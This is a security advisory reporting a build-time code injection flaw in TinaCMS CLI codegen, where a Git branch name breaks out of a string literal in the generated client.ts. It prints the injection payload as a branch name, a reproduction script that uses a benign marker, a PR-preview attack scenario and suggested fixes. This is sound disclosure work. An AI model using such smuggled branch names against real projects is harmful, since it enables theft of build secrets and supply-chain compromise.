Details
### Summary
`@tinacms/cli` inserts the raw Git branch value into the generated `client.ts` source without escaping or encoding. A Git-valid branch name can close the string literal and inject an arbitrary JavaScript expression that executes when the consumer build imports the generated client module.
### Affected component
- **Source (branch read):** `packages/@tinacms/cli/src/cmds/init/templates/config.ts` lines 155–172 — reads `VERCEL_GIT_COMMIT_REF`, `GITHUB_BRANCH`, or `HEAD` into `config.branch`
- **Transform (URL build):** `packages/@tinacms/cli/src/next/codegen/index.ts` lines 219–253 — `_createApiUrl()` concatenates the raw branch into the API URL with no `encodeURIComponent`
- **Sink (template):** `packages/@tinacms/cli/src/next/codegen/index.ts` lines 363–381 — `genClient()` interpolates the URL into `url: '${apiURL}'`
- **Sibling sink:** `packages/@tinacms/cli/src/next/codegen/codegen/plugin.ts` line 55 — `url: "${apiURL}"` (same pattern, double quotes)
### Root cause
The codegen template at `index.ts:376` uses:
```ts
url: '${apiURL}'
```
where `apiURL` contains the raw branch name. No `JSON.stringify`, `encodeURIComponent`, or string-escape function is applied at any point in the pipeline. A single quote in the branch name closes the string literal and allows expression injection.
### Payload
The following is a valid Git branch name (`git check-ref-format` accepts it):
```
x'+(globalThis.__TINA_PROBE='hit')+'
```
### Generated source (sink)
When codegen runs with this branch, the generated `client.ts` contains:
```ts
export const client = createClient({
url: 'https://content.tinajs.io/2.4/content/<clientId>/github/x'+(globalThis.__TINA_PROBE='hit')+'',
token: '<token>',
queries,
});
```
The `'` in the branch name closes the URL string. `+(globalThis.__TINA_PROBE='hit')+` is parsed as a JavaScript expression. The trailing `+'` reopens a string to keep the syntax valid.
### Steps to reproduce
**Prerequisites:** Node.js, Git, npm
```bash
mkdir /tmp/tinacms-repro && cd /tmp/tinacms-repro
git init && git commit --allow-empty -m "init"
git branch "x'+(globalThis.__TINA_PROBE='hit')+'"
npm init -y && npm install esbuild
```
Create `repro.mjs`:
```js
import { transform } from 'esbuild';
import vm from 'vm';
// Simulate VERCEL_GIT_COMMIT_REF containing the malicious branch
const branch = "x'+(globalThis.__TINA_PROBE='hit')+'";
// _createApiUrl() logic from index.ts:252
const apiURL = `https://content.tinajs.io/2.4/content/my-client/github/${branch}`;
// genClient() template from index.ts:376
const generated = `
import { createClient } from "tinacms/dist/client";
export const client = createClient({ url: '${apiURL}', token: 'xxx' });
`;
console.log("Generated source:\n", generated);
// Compile (same as consumer build)
const compiled = await transform(generated, { loader: 'ts', format: 'cjs' });
// Execute in sandboxed VM
const sandbox = {
globalThis: {},
module: { exports: {} },
exports: {},
require: () => ({ createClient: (o) => o }),
};
vm.createContext(sandbox);
vm.runInContext(compiled.code, sandbox);
console.log("__TINA_PROBE =", sandbox.globalThis.__TINA_PROBE);
// Output: __TINA_PROBE = hit
```
Run: `node repro.mjs`
**Result:** `globalThis.__TINA_PROBE` is set to `'hit'`, confirming the injected expression executed during module evaluation.
**Negative control:** Repeating with `branch = "feature/safe-branch"` does not trigger injection.
### Impact
The injected expression executes with the full privileges of the consumer build process. In a typical Vercel or GitHub Actions preview deployment:
- **Build environment variables** are accessible (`process.env`), which may include `NPM_TOKEN`, `VERCEL_TOKEN`, cloud provider secrets, and API keys
- **Build artifacts** can be modified, enabling supply-chain compromise of the deployed output
- **Network access** is available to exfiltrate data
**Attack scenario:** An attacker opens a pull request to any open-source project that uses TinaCMS with preview deployments enabled (Vercel auto-deploys every PR branch). The attacker's branch name contains the payload. The preview build runs Tina codegen, generates the injected `client.ts`, and the attacker's code executes during the build.
**Preconditions:**
1. Attacker can create a branch or PR that triggers a consumer build
2. Consumer uses TinaCMS with the scaffolded branch config (reading from `VERCEL_GIT_COMMIT_REF` or equivalent)
3. Tina SDK codegen is enabled (default)
### Severity rationale
**High** — build-time arbitrary code execution via a controlled Git ref. Critical was not claimed because no real secret exfiltration or release artifact tampering was demonstrated in this proof; only a benign marker was used.
### Suggested fix
1. Use `JSON.stringify(value)` to safely serialize any runtime value interpolated into generated source templates
2. Apply `encodeURIComponent()` to the branch value before constructing the API URL path segment
3. Apply the same treatment to `apiURL`, `token`, `errorPolicy`, `cacheDir`, and the sibling `AddGeneratedClientFunc` template in `plugin.ts`
4. Consider moving runtime values out of source templates entirely — pass them through a JSON config file that the generated client reads at runtime
### Related advisory
[GHSA-4936-9hrh-qqpw](https://github.com/advisories/GHSA-4936-9hrh-qqpw) — TinaCMS Forestry migration generated-source RCE. Different source (Forestry YAML labels), different parser (`__TINA_INTERNAL__` unquoting helper), and different sink (`tina/templates.ts`). This report is not a duplicate.